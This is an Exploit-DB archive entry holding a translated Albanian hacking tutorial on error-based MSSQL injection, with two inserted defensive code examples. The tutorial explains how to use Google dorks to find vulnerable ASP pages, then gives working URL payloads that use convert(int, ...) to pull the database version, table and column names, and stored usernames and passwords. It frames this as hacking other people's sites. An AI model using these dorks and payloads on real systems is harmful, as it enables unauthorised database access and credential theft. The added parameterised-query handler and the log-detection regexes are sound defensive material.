[Albanian] Getting Web Data Using the MSSQL-i Method

EDB-ID: 13585
CVE: N/A
Platform: Multiple
Published: 2010-01-07

==============================
MSSQL Injection Tutorial [ALB] 
==============================



#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Hi. I just visited your webpage & I wrote this tutorial. It shows how you can use MSSQL-i to get to the important data. I wrote it in the ALBANIAN language, so I hope that with this I can get you more Albanian visitors (HACKERS). There are a lot, but they aren't famous. Hope you will publish it. And coming soon in English. Waiting for your reply. :P. Best wishes
       

***************************************************

In this tutorial I will show you how to get to a website's data using the MSSQL-i method.

In this tutorial we will use this type of attack:
"ODBC Error Message Attack with CONVERT"


1. First we need to look for pages that are vulnerable.
--------------------------------------------------------

Finding pages that are vulnerable is very easy :P. For this we can use Google :D.

We open www.google.com and search with DORKS.

As an example I took a few. You can find plenty of others.

We type, e.g.:      inurl: "news.asp" "sub"
                    inurl: "games.asp" "id"
                    inurl: ".asp" "id"  ... etc.

2. Now we have to test whether the page is vulnerable to MSSQL-i.
------------------------------------------------------------------

This is also very easy. It is done by adding the string (') after id=100.

If the page answers with an error, then we know that the page is vulnerable. Some of the most
frequent responses are:

++++++++++++++++++++++++++++++++++++++++++++++
ODBC Microsoft Access Driver

Unclosed quotation mark

Microsoft OLE DB Provider for Oracle

Division by zero in

Microsoft OLE DB Provider for SQL Server error '80040e14'

And let's say we were given a response such as:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'.

/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++

This means that the page is vulnerable to attack!!!
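Added example, not part of the original tutorial: the quote test in step 2 only works because the page concatenates `id` into the query and returns the driver's error text to the browser. The sketch below puts that "before" beside a corrected handler; sqlite3 stands in for the MSSQL backend so it runs offline, and the handler names, table contents and response strings are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for MSSQL so this runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE lajmet (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO lajmet VALUES (?, ?)",
                   [(100, "Lajmi 100"), (101, "Lajmi 101")])
    return db

def vulnerable_handler(db, raw_id):
    """The 'before': concatenates the parameter and echoes driver errors."""
    try:
        rows = db.execute("SELECT title FROM lajmet WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        return 500, "DB error: " + str(exc)  # driver text reaches the client
    return 200, "; ".join(title for (title,) in rows)

def hardened_handler(db, raw_id):
    """The 'after': validate, bind, and keep error detail server-side."""
    # 1. id is numeric by design, so accept a short run of ASCII digits only.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return 400, "Bad request"
    try:
        # 2. Bound parameter: the value is never parsed as SQL.
        rows = db.execute("SELECT title FROM lajmet WHERE id = ?",
                          (int(raw_id),)).fetchall()
    except sqlite3.Error:
        # 3. Detail belongs in the server log, not in the response body.
        return 500, "Internal error"
    return (200, rows[0][0]) if rows else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    for probe in ("100", "100'", "100 or 1=1"):
        print(repr(probe), vulnerable_handler(db, probe), hardened_handler(db, probe))
```

On a real MSSQL backend the same three measures apply: a typed, bound parameter for `id`, input validation before the query, and a generic error page in place of the OLE DB message.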


3. How do we find the version of the database (DB)?
----------------------------------------------------

If the site looks like this: www.inj3ct0r.com/lajmi.asp?id=100   then we append this part to the end:
  +or+1=convert(int,(@@version))--

And in the end it becomes: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--

And it gives us the response:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2) (VM) ' to data type int.

/msn/shared/includes/main_rub.asp, line 4    

So we found the version! Now let's go further :P

4. How to find the names of the tables (table_name)
----------------------------------------------------

To find the tables of a website through this method we write:

e.g.: www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--

And an error will be shown to us, e.g.:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Users' to data type int.

/msn/shared/includes/main_rub.asp, line 4

So we found the first table. The first table is "Users"; now, to find the next table:

e.g.:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--

And again the same kind of error will be shown, and it gives us the second table:

e.g.:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'lajmet' to data type int.

/msn/shared/includes/main_rub.asp, line 4

So the second table is 'lajmet'. And we continue like this, in turn, for the other tables.

5. How to discover the column_names (the names of the columns).
----------------------------------------------------------------

If we want to discover the column_name for the "Users" table, since this is where the users and passwords most often are, we go to:

www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--

And it should give us an error like this one:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/msn/shared/includes/main_rub.asp, line 4

So the name of the first column of the "Users" table is "username".

Now we need to find the second column of the same table:

www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--

And it gives us a response (error):

 Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'password' to data type int.

/msn/shared/includes/main_rub.asp, line 4

So we also found the name of the second column. The column_name is "password". Now, if we want, we can continue to find the next column_names, but these are the 2 most important things for HACK!! :D

6. How to get the data that interests us, e.g. (username, password, etc.) :P
-----------------------------------------------------------------------------

In this part all that needs to be done is to put the table (table_name) and the column names (column_name) that we found earlier into their places.

Let's now substitute them, e.g.:

www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))--

And it gives us the response:
 Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Admin' to data type int.

/msn/shared/includes/main_rub.asp, line 4

So the username is: Admin

Now we replace the first column "username" with the second column "password":

e.g.:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--

And it gives us:
 
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value '123456' to data type int.

/msn/shared/includes/main_rub.asp, line 4

So the password is: 123456

And we continue in the same way for the other data.

So there we have managed to get some of the info, such as the username/pass of a page.

username: Admin
password: 123456
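
Added example, not from the original tutorial: a log check a defender can run over IIS-style access logs to spot the request shapes walked through in sections 2 to 6. The log lines are constructed, and the field layout, rule names and the "leaked" heuristic are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2010-01-07 10:00:01 203.0.113.5 GET /lajmi.asp id=100 200
2010-01-07 10:00:09 203.0.113.5 GET /lajmi.asp id=100' 500
2010-01-07 10:00:15 203.0.113.5 GET /lajmi.asp id=100+or+1=convert(int,(@@version))-- 500
2010-01-07 10:00:31 203.0.113.5 GET /lajmi.asp id=100+or+1=CONVERT%28int,%28select+top+1+table_name+from+information_schema.tables%29%29-- 500
2010-01-07 10:02:00 198.51.100.7 GET /convert.asp from=int&to=float 200
"""

RULES = {
    "quote_probe": re.compile(r"=\d+'(?:&|$)"),                # section 2
    "convert_to_int": re.compile(r"convert\s*\(\s*int\s*,\s*\("),  # sections 3-6
    "schema_enum": re.compile(r"information_schema\s*\.\s*(?:tables|columns)"),
    "version_read": re.compile(r"@@version"),
}

def normalize(query):
    """Undo URL encoding (up to 3 layers), SQL comments, spacing and case."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", query).lower()

def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):   # skip W3C header lines
            continue
        _date, time, ip, _method, stem, query, status = line.split()[:7]
        text = normalize(query)
        tags = sorted(name for name, rx in RULES.items() if rx.search(text))
        if tags:
            # A 500 on a convert(int,(...)) request suggests the error text,
            # and the value inside it, went back to the client.
            leaked = "convert_to_int" in tags and status == "500"
            findings.append({"ip": ip, "time": time, "stem": stem,
                             "tags": tags, "leaked": leaked})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings marked `leaked` are the ones to prioritise in incident response, since each corresponds to one value that may have been disclosed through an error page.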


I believe this will help you at least a little..

Happy hacking


*******************************************
Tuto by:**RoAd_KiLlEr**
*******************************************
Greetz to:Ton!WidnowS,Alboz-Crew, Inj3ct0r
*******************************************
WwW.inj3ct0r.com
*******************************************
